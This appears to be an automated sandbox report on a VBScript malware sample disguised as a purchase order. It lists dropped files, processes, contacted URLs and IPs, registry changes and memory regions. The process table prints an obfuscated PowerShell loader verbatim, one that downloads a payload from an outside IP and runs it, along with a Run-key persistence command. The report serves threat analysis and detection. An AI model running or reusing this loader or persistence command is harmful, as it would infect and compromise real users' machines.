Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
PO_La-Tanerie04180240124.vbs
|
ASCII text, with very long lines (308), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\lmouitrs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20jmdb51.amd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gs5gqbiv.qio.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tiy2gudj.whr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vndyilgm.oe1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Eyelike0.For
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_La-Tanerie04180240124.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function
Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres,
$Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs
'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0
0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E.
1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs
'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc
tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr
eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs '
$.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs '
$,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a
dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic
(Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens)
{Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs
' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo
n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+
% $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb
a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa
nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic
(Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF
iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt
rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function
Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres,
$Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs
'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0
0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E.
1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs
'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc
tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr
eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs '
$.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs '
$,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a
dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic
(Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens)
{Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs
' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo
n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+
% $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb
a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa
nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic
(Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF
iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt
rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ
/d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty
-Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
darvien99lakoustr01.duckdns.org
|
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
|
unknown
|
||
|
http://www.certplus.com/CRL/class3.crl0
|
unknown
|
||
|
http://www.e-me.lv/repository0
|
unknown
|
||
|
http://www.acabogacia.org/doc0
|
unknown
|
||
|
http://crl.chambersign.org/chambersroot.crl0
|
unknown
|
||
|
http://ocsp.suscerte.gob.ve0
|
unknown
|
||
|
http://87.121.105.163/YSnpkrCwWalJFSpN146.bindumpsSexaideca.org.pe/1/YSnpkrCwWalJFSpN146.bin
|
unknown
|
||
|
http://www.postsignum.cz/crl/psrootqca2.crl02
|
unknown
|
||
|
http://crl.dhimyotis.com/certignarootca.crl0
|
unknown
|
||
|
http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
|
unknown
|
||
|
http://www.chambersign.org1
|
unknown
|
||
|
http://www.pkioverheid.nl/policies/root-policy0
|
unknown
|
||
|
http://repository.swisssign.com/0
|
unknown
|
||
|
http://www.suscerte.gob.ve/lcr0#
|
unknown
|
||
|
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
|
unknown
|
||
|
http://crl.ssc.lt/root-c/cacrl.crl0
|
unknown
|
||
|
http://postsignum.ttc.cz/crl/psrootqca2.crl0
|
unknown
|
||
|
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
|
unknown
|
||
|
http://ca.disig.sk/ca/crl/ca_disig.crl0
|
unknown
|
||
|
http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
|
unknown
|
||
|
http://www.certplus.com/CRL/class3P.crl0
|
unknown
|
||
|
http://www.suscerte.gob.ve/dpc0
|
unknown
|
||
|
http://www.certeurope.fr/reference/root2.crl0
|
unknown
|
||
|
http://www.certplus.com/CRL/class2.crl0
|
unknown
|
||
|
http://www.disig.sk/ca/crl/ca_disig.crl0
|
unknown
|
||
|
http://www.defence.gov.au/pki0
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://www.sk.ee/cps/0
|
unknown
|
||
|
http://www.globaltrust.info0=
|
unknown
|
||
|
http://www.anf.es
|
unknown
|
||
|
http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
|
unknown
|
||
|
http://87.121.105.163/Flyvnings.u32XR
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://crl.postsignum.cz/crl/psrootqca4.crl02
|
unknown
|
||
|
http://pki.registradores.org/normativa/index.htm0
|
unknown
|
||
|
http://policy.camerfirma.com0
|
unknown
|
||
|
http://www.ssc.lt/cps03
|
unknown
|
||
|
http://ocsp.pki.gva.es0
|
unknown
|
||
|
http://www.anf.es/es/address-direccion.html
|
unknown
|
||
|
https://www.anf.es/address/)1(0&
|
unknown
|
||
|
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
|
unknown
|
||
|
http://ca.mtin.es/mtin/ocsp0
|
unknown
|
||
|
http://crl.ssc.lt/root-b/cacrl.crl0
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
|
unknown
|
||
|
http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
|
unknown
|
||
|
http://www.certicamara.com/dpc/0Z
|
unknown
|
||
|
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://wwww.certigna.fr/autorites/0m
|
unknown
|
||
|
http://www.dnie.es/dpc0
|
unknown
|
||
|
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://87.121.105.163
|
unknown
|
||
|
http://ca.mtin.es/mtin/DPCyPoliticas0
|
unknown
|
||
|
https://www.anf.es/AC/ANFServerCA.crl0
|
unknown
|
||
|
https://aka.ms/pscore6lBkq
|
unknown
|
||
|
https://repository.tsp.zetes.com0
|
unknown
|
||
|
http://87.121.105.163/Flyvnings.u32
|
87.121.105.163
|
||
|
http://www.globaltrust.info0
|
unknown
|
||
|
http://certificates.starfieldtech.com/repository/1604
|
unknown
|
||
|
http://acedicom.edicomgroup.com/doc0
|
unknown
|
||
|
http://www.certplus.com/CRL/class3TS.crl0
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://crl.anf.es/AC/ANFServerCA.crl0
|
unknown
|
||
|
http://87.121.105.163/YSnpkrCwWalJFSpN146.bin
|
87.121.105.163
|
||
|
http://www.certeurope.fr/reference/pc-root2.pdf0
|
unknown
|
||
|
http://ac.economia.gob.mx/last.crl0G
|
unknown
|
||
|
https://www.catcert.net/verarrel
|
unknown
|
||
|
http://www.disig.sk/ca0f
|
unknown
|
||
|
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
|
unknown
|
||
|
http://www.e-szigno.hu/RootCA.crl
|
unknown
|
||
|
http://www.sk.ee/juur/crl/0
|
unknown
|
||
|
http://crl.chambersign.org/chambersignroot.crl0
|
unknown
|
||
|
http://crl.xrampsecurity.com/XGCA.crl0
|
unknown
|
||
|
http://certs.oati.net/repository/OATICA2.crl0
|
unknown
|
||
|
http://crl.oces.trust2408.com/oces.crl0
|
unknown
|
||
|
http://www.quovadis.bm0
|
unknown
|
||
|
http://crl.ssc.lt/root-a/cacrl.crl0
|
unknown
|
||
|
http://certs.oaticerts.com/repository/OATICA2.crl
|
unknown
|
||
|
http://certs.oati.net/repository/OATICA2.crt0
|
unknown
|
||
|
http://www.accv.es00
|
unknown
|
||
|
http://www.pkioverheid.nl/policies/root-policy-G20
|
unknown
|
||
|
https://www.netlock.net/docs
|
unknown
|
||
|
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
|
unknown
|
||
|
http://www.e-trust.be/CPS/QNcerts
|
unknown
|
||
|
http://ocsp.ncdc.gov.sa0
|
unknown
|
||
|
http://fedir.comsign.co.il/crl/ComSignCA.crl0
|
unknown
|
||
|
http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
|
unknown
|
||
|
http://crl2.postsignum.cz/crl/psrootqca4.crl01
|
unknown
|
||
|
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
|
unknown
|
||
|
http://web.ncdc.gov.sa/crl/nrcaparta1.crl
|
unknown
|
||
|
http://www.datev.de/zertifikat-policy-int0
|
unknown
|
||
|
http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
|
unknown
|
||
|
https://repository.luxtrust.lu0
|
unknown
|
||
|
http://cps.chambersign.org/cps/chambersroot.html0
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.acabogacia.org0
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
darvien99lakoustr01.duckdns.org
|
94.156.79.69
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.156.79.69
|
darvien99lakoustr01.duckdns.org
|
Bulgaria
|
|
|
|
87.121.105.163
|
unknown
|
Bulgaria
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Urealistiske
|
Slotene
|
||
|
HKEY_CURRENT_USER\Environment
|
moorburner
|
||
|
HKEY_CURRENT_USER\SOFTWARE\akmsnxbfg-E906PA
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\akmsnxbfg-E906PA
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\akmsnxbfg-E906PA
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Calpack
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
59B3000
|
trusted library allocation
|
page read and write
|
|
|
|
9092000
|
direct allocation
|
page execute and read and write
|
|
|
|
1E3D03D0000
|
trusted library allocation
|
page read and write
|
|
|
|
5159000
|
heap
|
page read and write
|
|
|
|
8610000
|
direct allocation
|
page execute and read and write
|
|
|
|
1E3BE729000
|
heap
|
page read and write
|
||
|
722E000
|
heap
|
page read and write
|
||
|
74F0000
|
trusted library allocation
|
page read and write
|
||
|
27B9BF3F000
|
heap
|
page read and write
|
||
|
207BE000
|
stack
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA11000
|
trusted library allocation
|
page read and write
|
||
|
281C000
|
heap
|
page read and write
|
||
|
50F9000
|
heap
|
page read and write
|
||
|
45FC000
|
stack
|
page read and write
|
||
|
6C30000
|
direct allocation
|
page read and write
|
||
|
2810000
|
heap
|
page read and write
|
||
|
207FF000
|
stack
|
page read and write
|
||
|
4F70000
|
heap
|
page read and write
|
||
|
6DDB000
|
stack
|
page read and write
|
||
|
7FFD9B946000
|
trusted library allocation
|
page execute and read and write
|
||
|
72AB000
|
heap
|
page read and write
|
||
|
9AEEAF9000
|
stack
|
page read and write
|
||
|
848C000
|
stack
|
page read and write
|
||
|
2B90000
|
heap
|
page read and write
|
||
|
1E3C0AFD000
|
trusted library allocation
|
page read and write
|
||
|
2AEF000
|
stack
|
page read and write
|
||
|
27B9BFB6000
|
heap
|
page read and write
|
||
|
1E3C1AAF000
|
trusted library allocation
|
page read and write
|
||
|
27B9DD03000
|
heap
|
page read and write
|
||
|
27B9DE3E000
|
heap
|
page read and write
|
||
|
27B9DE43000
|
heap
|
page read and write
|
||
|
27B9DEA0000
|
heap
|
page read and write
|
||
|
8010000
|
heap
|
page read and write
|
||
|
1E3C0B35000
|
trusted library allocation
|
page read and write
|
||
|
27B9DE93000
|
heap
|
page read and write
|
||
|
200B0000
|
direct allocation
|
page read and write
|
||
|
27B9BFBD000
|
heap
|
page read and write
|
||
|
2091E000
|
stack
|
page read and write
|
||
|
513E000
|
heap
|
page read and write
|
||
|
27B9DE9D000
|
heap
|
page read and write
|
||
|
20C6D000
|
stack
|
page read and write
|
||
|
27B9DE86000
|
heap
|
page read and write
|
||
|
840E000
|
stack
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
1E3BE6B5000
|
heap
|
page read and write
|
||
|
27B9BFB5000
|
heap
|
page read and write
|
||
|
27B9DCBD000
|
heap
|
page read and write
|
||
|
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
|
50C0000
|
direct allocation
|
page read and write
|
||
|
27B9DE4A000
|
heap
|
page read and write
|
||
|
294E000
|
unkown
|
page read and write
|
||
|
2A5E000
|
unkown
|
page read and write
|
||
|
27B9E083000
|
heap
|
page read and write
|
||
|
27B9DE2F000
|
heap
|
page read and write
|
||
|
6C40000
|
direct allocation
|
page read and write
|
||
|
27B9BF30000
|
heap
|
page read and write
|
||
|
200A0000
|
direct allocation
|
page read and write
|
||
|
74C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
44C0000
|
trusted library allocation
|
page read and write
|
||
|
27B9D840000
|
remote allocation
|
page read and write
|
||
|
1E3C0583000
|
trusted library allocation
|
page read and write
|
||
|
7077000
|
trusted library allocation
|
page read and write
|
||
|
20100000
|
direct allocation
|
page read and write
|
||
|
1E3C0165000
|
heap
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
50A0000
|
heap
|
page readonly
|
||
|
27B9DE13000
|
heap
|
page read and write
|
||
|
28E0000
|
heap
|
page read and write
|
||
|
7540000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
1E3BE769000
|
heap
|
page read and write
|
||
|
1E3D8840000
|
heap
|
page execute and read and write
|
||
|
27B9BEC0000
|
heap
|
page read and write
|
||
|
7FFD9B87B000
|
trusted library allocation
|
page read and write
|
||
|
27B9BF9C000
|
heap
|
page read and write
|
||
|
4811000
|
trusted library allocation
|
page read and write
|
||
|
1E3C1AB4000
|
trusted library allocation
|
page read and write
|
||
|
4150000
|
remote allocation
|
page execute and read and write
|
||
|
228E58E0000
|
heap
|
page read and write
|
||
|
27B9DE82000
|
heap
|
page read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
47DE000
|
stack
|
page read and write
|
||
|
27B9DE07000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
27B9BFCC000
|
heap
|
page read and write
|
||
|
27B9BFD0000
|
heap
|
page read and write
|
||
|
2054D000
|
stack
|
page read and write
|
||
|
1E3BE6E0000
|
heap
|
page read and write
|
||
|
27B9DE7C000
|
heap
|
page read and write
|
||
|
6C20000
|
direct allocation
|
page read and write
|
||
|
27B9DCE7000
|
heap
|
page read and write
|
||
|
27B9DEDA000
|
heap
|
page read and write
|
||
|
66205FE000
|
stack
|
page read and write
|
||
|
8630000
|
direct allocation
|
page read and write
|
||
|
27B9DF1A000
|
heap
|
page read and write
|
||
|
2E7F000
|
stack
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
5839000
|
trusted library allocation
|
page read and write
|
||
|
20140000
|
direct allocation
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
27B9BF9C000
|
heap
|
page read and write
|
||
|
1E3C1FA4000
|
trusted library allocation
|
page read and write
|
||
|
1E3C0361000
|
trusted library allocation
|
page read and write
|
||
|
4755000
|
heap
|
page execute and read and write
|
||
|
459E000
|
stack
|
page read and write
|
||
|
27B9DE81000
|
heap
|
page read and write
|
||
|
850D000
|
stack
|
page read and write
|
||
|
27B9DDB3000
|
heap
|
page read and write
|
||
|
27B9DF66000
|
heap
|
page read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
27B9DE41000
|
heap
|
page read and write
|
||
|
292E000
|
stack
|
page read and write
|
||
|
1E3D0659000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
1E3D86E0000
|
heap
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
206C0000
|
heap
|
page read and write
|
||
|
20AEE000
|
stack
|
page read and write
|
||
|
27B9DE82000
|
heap
|
page read and write
|
||
|
8640000
|
direct allocation
|
page read and write
|
||
|
7FFD9BA1A000
|
trusted library allocation
|
page read and write
|
||
|
27B9DCEA000
|
heap
|
page read and write
|
||
|
50FD000
|
heap
|
page read and write
|
||
|
1E3BE6D0000
|
trusted library allocation
|
page read and write
|
||
|
44F0000
|
trusted library allocation
|
page read and write
|
||
|
27B9BFE3000
|
heap
|
page read and write
|
||
|
20150000
|
direct allocation
|
page read and write
|
||
|
1E3D8870000
|
heap
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
27B9BFB9000
|
heap
|
page read and write
|
||
|
27B9BF2A000
|
heap
|
page read and write
|
||
|
4640000
|
trusted library allocation
|
page execute and read and write
|
||
|
42B2000
|
remote allocation
|
page execute and read and write
|
||
|
2978000
|
heap
|
page read and write
|
||
|
5162000
|
heap
|
page read and write
|
||
|
27B9BFC0000
|
heap
|
page read and write
|
||
|
7FFD9BA42000
|
trusted library allocation
|
page read and write
|
||
|
27B9DDBC000
|
heap
|
page read and write
|
||
|
2B70000
|
heap
|
page read and write
|
||
|
27B9BF9C000
|
heap
|
page read and write
|
||
|
228E59C5000
|
heap
|
page read and write
|
||
|
6E5B000
|
stack
|
page read and write
|
||
|
25C0000
|
heap
|
page read and write
|
||
|
2CE0000
|
heap
|
page read and write
|
||
|
20090000
|
direct allocation
|
page read and write
|
||
|
27B9D840000
|
remote allocation
|
page read and write
|
||
|
2AFE000
|
heap
|
page read and write
|
||
|
27B9BF30000
|
heap
|
page read and write
|
||
|
662148D000
|
stack
|
